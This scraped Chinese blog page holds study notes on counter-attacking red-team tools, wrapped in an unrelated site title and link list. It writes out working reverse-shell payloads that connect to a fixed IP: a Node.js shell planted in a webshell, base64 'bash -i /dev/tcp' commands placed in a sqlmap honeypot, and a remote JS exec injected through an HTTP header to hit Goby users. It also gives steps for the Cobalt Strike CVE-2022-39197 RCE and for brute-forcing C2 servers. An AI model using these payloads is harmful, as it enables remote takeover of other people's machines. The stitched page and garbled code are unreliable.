当前位置: 首页 > news >正文

织梦示范网站wordpress主题无法预览

织梦示范网站,wordpress主题无法预览,网站开发流程心得体会,中国交通建设网站用途#xff1a;个人学习笔记#xff0c;欢迎指正 目录 背景#xff1a; 一、后门修改反制上线 二、Linux溯源反制-SQL注入工具-SQLMAP 1、测试反弹编码加密#xff1a; 2、构造注入点页面test.php固定注入参数值#xff0c;等待攻击者进行注入 3、红队攻击者进行注…用途个人学习笔记欢迎指正 目录 背景 一、后门修改反制上线 二、Linux溯源反制-SQL注入工具-SQLMAP 1、测试反弹编码加密 2、构造注入点页面test.php固定注入参数值等待攻击者进行注入 3、红队攻击者进行注入测试 三、溯源反制-漏洞扫描工具-Goby (1)、构造页面index.php: (2)、将index.php1.js放入网站目录 (3)、模拟红队使用Goby扫描分析漏洞触发代码反而被蓝队拿到权限CS上线 四、 溯源反制-远程控制工具-CobaltStrike 1、伪造流量批量上线欺骗防御 2、利用漏洞(CVE-2022-39197) 3、反制Server,爆破密码通用 背景 黑客一般会用到工具Sqlmap,Goby等对目标网站的现有资产做批量扫描和测试同时也会利用Web应用漏洞上传后门来上线肉机用到工具例如蚁剑CS等那么作为蓝队应急人员就可以针对这些行为采取反制手段。 一、后门修改反制上线 原理网站目录查到红队后门时蓝队修改后门添加上线代码当红队使用蚁剑连接后门时触发代码反而被上线. 1、后门修改测试 ?php header(HTTP/1.1 500 img src# onerroralert(1));2、后门修改上线Nodejs代码 var net require(net), sh require(child_process).exec(cmd.exe); var client new net.Socket(); client.connect(1122, 47.94.236.117, //蓝队控制端IP和端口 function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});3、编码组合后 header(HTTP/1.1 500 Not img src# onerroreval(new Buffer(mFyIG5ldCA9IHJIcXVpcmUolm5ldClpLCBzaCA9IHJIcXVpcmUolmNoaW xkX3Byb2NIc3MiKS5leGVjKCJjbWQuZXhllik7CnZhciBjbGllbnQgPSBuZXcgbmVo LINvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgljQ3Ljk0LjIzNi4xMTciLC BmdW5jdGlvbigpe2NsaWVudC5waXBIKHNoLnNOZGluKTtzaC5zdGRvdXQucGlwZShj bGllbnQpO3NoLnNOZGVyci5waXBIKGNsaWVudCk7fSk7,base64).toString() ));管道符 中放的就是2中代码的base64加密值 二、Linux溯源反制-SQL注入工具-SQLMAP 蓝队提前构造注入页面诱使红队进行sqlmap注入拿到红队机器权限 环境红队攻击机和蓝队主机都是linux系统 原理 命令管道符ping dir       linux系统执行该命令时管道符中的字符串被当作命令执行 sqlmap -u http://47.94.236.117/test.html?idaaabdir sqlmap -u http://47.94.236.117/test.html?idaaabexec /bin/sh 0/dev/tcp/47.94.236.117/2233 10 20 同样以上命令在红队攻击机执行时参数b管道符中的字符串会被当做命令执行。 1、测试反弹编码加密 bash -i /dev/tcp/47.94.236.117/2233 01 YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzlzMzMgMD4mMQ echo YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzlzMzMgMD4mMQ | base64 -d |bash -i 2、构造注入点页面test.php固定注入参数值等待攻击者进行注入 html headmeta charsetutf-8titleA sqlmap honeypot demo/title /head bodyinputsearch the user/input  !--创建一个空白表单-form actionusername.html methodpost enctypetext/plain!--创建一个隐藏的表单--input typehidden namename valuexiaodiid45273434queryshellecho YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LZIzMzMgMD4mMQ base64 -d|bash -iport6379/!--创建一个按钮提交表单内容-input typesubmit value提交/form /body /html 3、红队攻击者使用Sqlmap进行注入测试反被上线 原理红队执行这个注入命令时管道符中的加密字符串被解密后执行而解密执行的命令就是反弹shell的命令使用Sqlmap工具时不知不觉就把shell权限给出去了 sqlmap -u http://xx.xx.xx.xx/test.php --data namexiaodiid45273434queryshellecho YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ | base64 -d|bash -iport6379 三、溯源反制-漏洞扫描工具-Goby 环境蓝队Linux系统  Web程序            红队Windows10  Goby 原理蓝队在红队攻击目标上写一个特殊文件红队用goby扫描分析时会触发反制被蓝队拿到机器权限。 1、构造页面index.php: ?php header(X-Powered-By:PHP/img src1 onerrorimport(unescape(http%3A//47.94.236.117/1.js))); ? head titleTEST/title /head body testtest /body /html 构造1.js代码  cs上线只需要把calc.exe改成powershell代码 (function(){ require(child_process).exec(calc.exe); })(); 2、将index.php1.js放入网站目录 3、模拟红队使用Goby扫描分析漏洞触发代码反而被蓝队拿到权限CS上线 四、 溯源反制-远程控制工具-CobaltStrike 蓝队Linux Web 红队Windows10  Goby 对抗Cobaltstrike中的手段 1、伪造流量批量上线欺骗防御 https://mp.weixin.qq.com/s/VCRg6F9Wq-yg-qajDoJuaw 2、利用漏洞(CVE-2022-39197) Cobalt Strike 4.7 XSS ·获取真实ip地址 ·获取NTLM ·RCE ·SSRF 地址https://github.com/its-arun/CVE-2022-39197 (1)、蓝队修改EXP里面的执行命令后编译成jar包 修改EvilJar/src/main/java/Exploit.java  中的执行命令 (2)、蓝队修改svg加载地址并架设Web服务 修改evil.svg  指向url地址只要evil.svg被访问就会加载这个jar包命令就会执行。 svg xmInshttp://www.w3.org/2000/svg xmIns:xlinkhttp://www.w3.org/1999/xlink version1.0 script typeapplication/java-archive xlink:hrefhttp://47.94.236.117:8888/EvilJar-1.0-jar-with-dependencies.jar/ textCVE-2022-39197/text /svg 架设Web服务  python -m http.server 8888 (3)、蓝队利用EXP主动运行红队的后门被上线攻击者CS客户端进程查看时触发加载蓝队架设的web服务jar包中的命令就会执行。 python cve-2022-39197.py artifact.exe http://47.94.236.117:8888/evil.svg原理蓝队利用exp主动运行后门被红队上线当红队CS客户端查看进程时触发加载这个web服务evil.svg 文件而这个文件又加载了EvilJar-1.0-jar-with-dependencies.jar这个jar包中蓝队构造的命 令就被执行从而达到反制红队的效果。 3、反制Server,爆破密码通用 针对没有采用隐匿C2地址的技术导致的反制(后门样本被溯源到C2地址) https://github.com/ryanohoro/csbruter python csbruter.py 47.94.236.117 pass.txt
http://www.zqtcl.cn/news/685980/

相关文章:

  • 做网站是前端还是后端小程序网站模板
  • 学校网站建设与维护建设银行官网电话
  • dedecms网站地图修改软件开发公司规章制度
  • 大型旅游网站骏驰网站开发
  • 有心学做网站两学一做知识竞赛试题网站
  • 西宁圆井模板我自己做的网站怎么做网站能快速赚钱
  • 根据网站集约化建设的要求直流分公司四川建设部网站
  • 网站优化平台有哪些遵义网站开发的公司有哪些
  • 推荐一下网站谢谢微盟微商城怎么样
  • 网站建设的技术指标网站做好第二年要多少钱
  • 工业设计东莞网站建设WordPress网络功能
  • 网站pv多少可以企业网站托管常见问题
  • 深圳有哪些网站建设沈阳做机床的公司网站
  • 2022年网站能用的wordpress 客户端使用
  • 社交网站建设内容如何制作橡皮泥 简单
  • 简述网站的制作流程wordpress定制分类
  • 如何自建购物网站wordpress文章编辑插件
  • 网站策划机构建筑网站、
  • 邹平做网站的公司标志设计图片大全简单
  • 广东省建设厅官方网站多少钱如何在虚拟机里面做网站
  • 上海免费网站建设模板做网站页面的软件
  • 做折页的网站个人网站有哪些
  • 服装网站建设内容wordpress媒体库只能列表
  • 北京好的做网站的公司东莞专业做淘宝网站
  • 网站结构怎么优化wordpress文章列表添加字段
  • 网站建设框架图长沙官网seo技术厂家
  • 电子商务网站建设主管的策划案html个人网站设计模板
  • 网站首页的head标签内做网站要学的教程
  • 网页设计教学网站江西省建设监督网站
  • 网站建设与发布需要什么提供网站制作公司哪家好